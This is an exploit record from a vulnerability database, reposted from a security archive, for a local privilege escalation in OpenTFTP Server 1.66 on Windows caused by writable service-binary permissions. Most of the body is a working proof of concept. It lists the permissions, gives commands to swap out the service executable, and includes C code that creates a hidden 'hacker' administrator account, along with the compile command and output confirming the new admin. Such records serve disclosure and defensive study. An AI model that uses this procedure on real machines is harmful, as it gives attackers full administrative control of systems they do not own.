Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OpenTFTP 1.66 Local Privilege Escalation

🗓️ 13 Feb 2020 00:00:00Reported by bokuType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 114 Views

OpenTFTP 1.66 Local Privilege Escalation - insecure service and folder permission

Code
`# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation  
# Exploit Author: boku  
# Date: 2020-02-12  
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/  
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download  
# Version: 1.66  
# Tested On: Windows 10 (32-bit)  
  
# About:   
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,   
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."   
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/  
  
# Vulnerability Details:  
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions.   
# This allows a low-privilge, local attacker to escalate their permissions to Administrator;   
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable.   
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the   
# default installation. After the attacker has planted the malicious binary, the code will   
# be executed with System priviledges on the next boot of the windows device. See PoC below for details.  
  
## Service Information (there is also an Unquoted Service Path)  
C:\>sc qc TFTPServer  
SERVICE_NAME: TFTPServer  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Open TFTP Single Port Server  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
## Insecure Folder Permission  
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F  
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F  
BUILTIN\Users:(OI)(CI)(ID)R  
NT AUTHORITY\Authenticated Users:(ID)C  
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C  
  
## Insecure File/Service Permission  
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
BUILTIN\Users:(I)(RX)  
NT AUTHORITY\Authenticated Users:(I)(M)  
  
## Local Privilege Escalation Proof of Concept  
#0. Download & install Open TFTP Server v1.66  
  
#1. Create low privileged user & change to the user  
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"  
User name lowPrivUser  
Local Group Memberships *Users  
Global Group memberships *None  
C:\>whoami  
mycomputer\lowprivuser   
  
#2. Move the Service EXE to a new name  
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe  
1 file(s) moved.  
  
#3. Create malicious binary on kali linux  
1) Download dependencies  
root@kali# apt install gcc-mingw-w64-i686 wine64 -y  
2) Add Admin User C Code  
root@kali# cat addAdmin.c  
#include<windows.h>  
int main(void){  
system("net user hacker mypassword /add");  
system("net localgroup Administrators hacker /add");  
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);  
return 0;  
}  
3) Compile Code  
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe  
  
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host   
  
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder  
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\  
1 file(s) moved.  
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"  
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe  
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe  
  
#6. Reboot the Computer  
  
#7. Look at that new Admin  
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"  
User name hacker  
Account active Yes  
Local Group Memberships *Administrators *Users  
  
C:\Users\lowPrivUser>net localgroup Administrators  
Alias name Administrators  
Comment Administrators have complete and unrestricted access to the computer/domain  
  
Members  
-------------------------------------------------------------------------------  
Administrator  
boku  
hacker  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Feb 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
opentftplocal privilege escalationservice permissionsfolder permissionswindows 10vulnerability detailsproof of conceptinsecure file permissions
114